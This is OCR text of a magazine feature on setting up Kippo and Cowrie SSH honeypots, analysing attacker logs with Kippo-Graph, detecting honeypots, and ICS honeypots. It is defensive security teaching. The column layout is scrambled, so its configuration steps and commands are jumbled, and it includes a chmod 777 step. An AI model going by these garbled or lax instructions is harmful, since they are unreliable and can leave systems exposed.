PTURE
CA S
RUDER Makefest 2017
20
Ethical hacking
This guide must be deployed for
investigation or to protect
an organisation only
AT A GLANCE
Set up a honeypot, p22 within the kippo.log ile and folders such Question: are you are inside a
Learn how to set up a medium-interaction as log and tty. honeypot?, p28
SSH honeypot, which logs the entire shell What we used: Python script playlog.py Learn how to identify if you are trapped in
interaction and brute-force attacks. to display a real-time recorded attacker a honeypot to improve your own designs.
What we used: Kippo (https://github.com/ shell interaction. What we used: Techniques to igure out
desaster/kippo) and its fork called Cowrie. whether you are inside a virtual machine
Kippo and Cowrie (www.micheloosterhof. Visualise the data, p26 that's being used as a honeypot and
com/cowrie) are easy to install and they How to graphically see all the information identifying a honeypot using Shodan
are the most popular over the internet collected by Kippo and Cowrie in a (www.shodan.io) and an IP address.
honeypots. web browser.
What we used: Kippo-Graph (http:// IoT & ICS honeypots, p29
Processing the data, p24 bruteforcelab.com/kippo-graph) a script How a honeypot in an Industrial Control
Discover how to shape the attack and to visualise statistics and any other data System (IOC) works and the most common
attacker proile by analysing the data from a Kippo or Cowrie honeypot. honeypots that are used.
rganisations are always innovating Honeypots are classiied by two factors: level, services, applications or systems are
www.linuxuser.co.uk 21
Feature Capture intruders
Below Honeypots are classified by two Allows the analysis of the data gathered
main factors: the honeypots target
and the attackers level of interaction
Helps in discerning the risk and
Research anticipating countermeasures needed
According to
the target Gathers better information about the
techniques used by the attackers
Production Higher risk because the honeypots are
located within an organisation
apt-get install python-dev openssl python- Dont forget to change your location to the directory where
openssl python-pyasn1 python-twisted Kippo was installed.
First, lets cover Kippos configuration. Its the key file
One way to install Kippo is to download it directly from the as it provides flexibility and personalisation of the final
GitHub repository by running: Kippo setup. The config file is called kippo.cfg.dist and
should be copied or renamed as kippo.cfg. In Figure 1,
git clone https://github.com/desaster/kippo Kippo has been set on port 2223. Later on, an iptables
rule will need to be applied to forward all the incoming
You can also install Kippo by using Subversion. If you dont traffic that goes to port 22 to 2223. In this way, when an
have it installed, just type apt-get install subversion attacker scans the IP address, theyll find an SSH service
and then download the latest version with: on port 22 thats really our honeypot:
22
Kippos folders of interest Figure 1
Before exposing the honeypot to the internet and starting
to collect attacker information, its necessary to list the
folders where Kippo will keep the data collected. The first
folder is called data. This will store all the SSH public
keys used by Kippo. This folder is where two text files
are stored too. The first one is called lastlog.txt, which
records the IP address, date and how long an attackers
activity lasted after logging into the system using the
root account. This information is very useful and will be
the first to be analysed in the during the information
processing (see p24).
The second file is named userdb.txt and stores
users and their passwords that are allowed to access
the system. The format of userdb.txt must match the
following settings:
Username:UID:PlainText Password
Above An example of
HOW TO kippo.cfg, where the
Another important Kippo folder is dl. This stores any SSH port has been
files uploaded by an attacker, once the system is Customise Kippo set to port 2223 by
changing the value of the
compromised. This enables us to retrieve and assess The primary coniguration ile where we can enter ssh_port variable
any possible malicious files to identify any known or new values for all the directives and customise Kippo
malware and understand the behaviour being logged. is called kippo.cfg.dist (kippo.cfg). This includes,
listening ports for incoming SSH connections and
the location for iles uploaded by an attacker:
the Linux folder structure, Kippo will be listening for all the requests.
ssh_port: Kippos listening port. The preference
the longer the attacker would be to set this to port 22, although you
should run Kippo as root or sudoer.
will remain working on hostname: Shows the computers name the
attacker will see once they gain access. Try using
our honeypot appealing names such as PayrollPC.
log_path: The path where the log ile will be
stored for recording all actions and events taking
Our third folder is called honeyfs stores all the folders place on the computer. This info will be stored in
and files that are shown to the attacker. Folders such the kippo.log file; a folder called tty will store all
as etc and proc are already in honeyfs and inside each session logs and is useful for analysis afterwards.
folder youll find some files of interests for the attacker, download_path: The path to the folder where all
but all of them are only text files. the files uploaded by the attacker will be stored.
To make the honeypot feel more realistic and attractive By default, this option is set to 0 (no limit).
to a potential attacker, we can create other folder download_limit_size: Sets the maximum size for
structures inside honeyfs. The better we simulate the any file that can be downloaded by the attacker.
Linux folder structure, the longer the attacker will remain content_path: The path where the virtual
inside our honeypot and we will get better results. files are stored. By default, the path is set to the
The fourth and final folder we will highlight is log. honeyfs folder, which also contains etc and proc.
This folder is critical for processing all the information txtcmds_path: The path to the folder where
collected by your honeypot and reaching conclusions the output of programs executed is stored. If the
about an attack. The longer a honeypot is exposed to attacker runs the command ifconig, we could
the internet, the better the quality of the information create a file ifconfig and put inside output to be
will be that it collects. The file kippo.log and the folder displayed. By default, the path is txtcmds.
tty sit inside the log folder. The tty folder records all the exec_enabled: This enables the option to
interactive sessions made by the attackers. These files run commands on the computer using ssh
should be processed to obtain a better understanding of execCommand, which is disabled by default.
the behaviour and goals of the attackers. Enabling this creates a bigger risk to your setup.
The kippo.log file stores unauthorised access ssh_version: Indicates what version of SSH to
attempts, connection attempts and all commands typed display, which is output in string format.
by an attacker during a session. This file must be
www.linuxuser.co.uk 23
Feature Capture intruders
24
root authenticated with password
2017-07-07 02:48:31+0200 [SSHService ssh-
userauth on HoneyPotTransport,327,72. X.XX.XXX]
starting service ssh-connection
HoneyPotTransport,327,72.X.XX.XXX] login
attempt [root/123456] succeeded
www.linuxuser.co.uk 25
Feature Capture intruders
Kippo-Graph is a script created to visualise all the overall information, such as: the total number of access
QUICK TIP information harvested by Kippo SSH Honeypot. It uses attempts; number of different IPs that tried to access
File hunt some modules and APIs, such as Googles Visualization the honeypot; and the activity timeframe where all the
The files passwd API for maps and Libchart PHP for drawing charts, information was registered. The next section, called
and shadow, in to create several graphs and statistics based on all Input, manages all the information that was registered by
the etc folder, are the attackers registered by the honeypot. Most of the keystrokes made by attackers. The first graph displayed
the most wanted information managed by Kippo-Graph is located in in the section shows all the human activity inside the
by the attackers a MySQL database (the rest of the data collected is Honeypot. In this way, Kippo-Graph can estimate and
because these located in the log files) and it connects directly to all the present how many attacks were made by humans or how
files store MySQL tables using the parameters configured in the many were automated. The table called Top 10 successful
essential conig.php file. input shows the top ten commands run successfully by
information Kippo-Graphs current version can show several the attackers once they gained access to the honeypot.
related to the types of graphs (such as pie chart, column chart and so Theres a special follow-up to the wget command to trace
users and their on) and presents information about, for example, top any file that the attacker was able to download from
passwords. ten passwords used by attackers, top ten usernames, the honeypot.
IP connections, connections by countries and much The next section, Playlog, shows off the most
more. All the information displayed can be exported interesting feature of Kippo-Graph. This presents
Below This table displays
one successful access to CSV format for further processing by any other log a step-by-step replication (like a frame-by-frame
and several failed analyser application. animation) of all the activity related to an attack.
attempts that registered In Kippo-Graphs first section, called Overview, we Basically, this section does the same thing as the
in our session, seen
in the Kippo-Graph can see a summary of all the data highlights stored by playlog.py script (see p24), but this time it runs over
Network section Kippo. In the section header, it shows some important the Kippo-Graph website. It also shows detailed data
HOW TO
Download, install and set up Kippo-Graph
26
focused on the attacker and sessions, such as in the
following example: HOW TO
Analysing the files uploaded
Information about the attacker and session:
Session ID: 8816a99665ff11e79f03020000f0e954 by the attackers
As a part of the post-attack analysis, we need
Timestamp: 2017-07-11 06:09:46 (10.5 minutes)
to look at the dl folder and find possible files
Attackers IP: 195.X.XX.XXX
uploaded by the attackers. Most of these files
Number of sessions for the attackers IP: 1
will have some type of malware or tools to exploit
Number of times the attackers IP have been
system vulnerabilities. This info will help us to
seen: 1
understand the type of the attack made against
Total login attempts: 2
the honeypot and to learn how to protect our real
SSH credentials: root / 123456
infrastructure. The first part of the analysis should
Total number of input commands: 4 (0 failed
be to send iles through an online analysis service
commands)
for example, VirusTotal (www.virustotal.com).
This service can detect viruses, worms, Trojans
It also shows detailed technical info about the attackers
and other malware by just uploading the ile to
IP and a map locating the attacker via IP geolocation.
the website or pasting the URL (or IP if we want
The Network section displays a summary table with
to check an internet location). VirusTotal has 56
all the IP addresses registered by the honeypot. It also
different types of antivirus and 61 engines, as well
contains geolocation, sessions made, successfully
as other tools that can be installed in browsers,
sessions and the date of the latest attempt made. Clicking
smartphones or Windows. It acts like a sandbox
on any of the sessions yields more information about it,
(an environment totally isolated to simulate the
such as username and password used for access.
ile execution within the operating system) and
The Geoip section displays geolocation information
allows you to run the file and check its behaviour
related to attackers over a layer of Google Maps, but its
and consequences of running it. There are other
also possible to analyse the IP registered using some
services worth investigating that act as sandboxes
online services that check their trustworthiness and if
to check files, such as ThreatExpert (www.
they are registered as potentially dangerous sites. Some
threatexpert.com) and Malwr (https://malwr.com).
of these online services used in Kippo-Graph are McAfee
and VirusTotal.
04 Preparing Kippo-Graph
Copy the folder cloned or copied in
Step 2 or 3 to /var/www/html, then change
05 Configuring Kippo-Graph
The coniguration ile config.
php has many parameters that can be
06 Accessing Kippo-Graph
Once all the changes to the
config.php file have been made to your
to that folder with cd /var/html/kippo- changed, but lets focus on a few signiicant satisfaction, you will need to restart
graph-1.5.1/. Next, set up full read, write ones: DB_HOST must be set to localhost the Apache service in order to apply
and execute permissions to the generated- or 127.0.0.1; DB_USER is the MySQL user the new coniguration values. Once this is
graphs folder with sudo chmod 777 created for Kippo, DB_PASS is the MySQL done, open your web browser and type the
generated-graphs. Finally, config.php.dist password, DB_NAME is Kippos database following: http://<yourIPorServer>/kippo-
must be copied to config.php before name; and finally, DB_PORT is the port graph. At this point, you will see the main
making any changes to it with: sudo mv connection to the database (by default Kippo-Graph web page with your honeypot's
conig.php.dist conig.php. this is 3306). activity overview, as displayed above.
www.linuxuser.co.uk 27
Feature Capture intruders
01 Introducing T-Pot
T-Pot combines honeypots Conpot,
Cowrie, Dionaea, ElasticPot, eMobility, Glastopf
ENGINEERING ALARM SERVERS HMI APPLICATION HISTORIAN
WORKSTATION SERVERS and honeytrap with Suricata (a network-
monitoring security engine). It visualises the
collected data with ELK stack (Elasticsearch,
CONTROL ELEMENTS (PLCs RTUs, SIS) INDUSTRIAL PROTOCOLS Logstash and Kibana), which has a beautiful
visualisation engine. T-Pot runs every daemon
in a Docker container for good insolation.
REMOTE
SUPPORT
Above A diagram of a
02 Requirements and installation
T-Pot can be installed on a physical
computer or in a VM using different setups.
typical industrial network
Kippo is a good learning environment. It has been one To avoid any issues during installation make
of the most-used honeypots for a long time now, but sure your system meets the following spec:
as its not as regularly updated, the chances of it being 4GB RAM (8GB recommended), 64GB hard disk
detected by an attacker are greater. Now were familiar (128GB recommended) and a working internet
with the concepts, we need a more secure environment, connection. Installing T-Pot is easy: just download
so lets move on to Cowrie. Fortunately, migrating from the ISO ile from http://community-honeypot.de/
Kippo to Cowrie is very easy because its a fork of Kippo. tpot.iso and run it in your designated setup.
In addition, Cowrie provides a host of new features such
as SFTP and SCP file uploads, SSH exec commands
support, JSON format for log files and more. Cowrie
is regularly updated and frequently patched, and as
Cowrie is virtually the same as Kippo, its 100 per cent
compatible with Kippo-Graph, too.
Cowrie has a similar folder and file setup to Kippo. The
dl, data, bin, honeyfs and txtcmds folders perform the
same function as Kippo. The log folder has almost the
same files as Kippo, but the main configuration file for
Cowrie is called cowrie.cfg.dist. As we did with Kippo, this
file must be copied and renamed cowrie.cfg. Cowries new
03 Running T-Pot
The install takes about 30 minutes and
will reboot. The user is tsec and youll need to the
features add some new config files, such as fs.pickle for a password you chose during install. All honeypots,
fake filesystem, which is allocated to the data folder, and depending on the type of setup chosen, will start
cowrie.json which stores log records in JSON format. automatically. To access T-Pot from the browser,
Youll also need to install a few dependencies: type https://<your.ip>:64297 and log in with
your credentials. Head to https://github.com/
apt-get install git python-virtualenv dtag-dev-sec/tpotce for more details.
libmpfr-dev libssl-dev libmpc-dev libfi-dev
28
build-essential libpython-dev python2.7-minimal interaction are the most difficult to detect since they
authbind offer real services instead simulated ones.
QUICK TIP
Metasploit has some modules that can detect whether Pi pots
As we did with Kippo, its recommended to create a or not you are dealing with a honeypot and even has a The Raspberry
separate user account for Cowrie and not use root. Kippo SSH Honeypot Detector that uses the returned Pi is an easy
messages method described above. Using the search and cheap
Installing Cowrie engine Shodan (https://honeyscore.shodan.io), its also platform to
You can clone Cowrie from the GitHub repository: possible to find out if an IP address is a honeypot without deploy any kind
even connecting to it. of honeypot. Due
git clone https://github.com/micheloosterhof/ to its small size
cowrie Honeypots to protect ICS and IoT devices and portability,
IoT and ICS (industrial control system) environments a Pi is perfect
Cowrie configuration is almost a drop-in replacement for are increasingly suffering more attacks. Critical for simulating
Kippo, but we need to make a few changes in cowrie.cfg: infrastructure, such as dams and power grids, is a fake Wi-Fi
threatened by this type of attack. Stuxnet is the access point.
# JSON based logging module best-known case of an attack on an ICS in this case,
[database_jsonlog] a nuclear plant in Iran and attack techniques are
logile = log/cowrie.json becoming more sophisticated, so using honeypots
# Enables passing commands using ssh is a good way to stop and study attacks before they
execCommand can affect the real facilities. ICSes are often made up
# e.g. ssh root@localhost <command> of several components, such as SCADA (supervisory
# (default: false) control and data acquisition), PLC (programmable logic
exec_enabled = true controller), RTU (remote terminal units) and HMI (human-
# sftp_enabled enables the sftp subsystem machine interfaces). An ICS will also have its own internal
sftp_enabled = true computer network for services such as email, web
services and so on. Therefore, its possible to install some
To start Cowrie is pretty much the same as Kippo, so cd honeypots within the industrial network to simulate any
cowrie/ followed by ./start.sh. of these services or tasks. There are honeypots designed
www.linuxuser.co.uk 29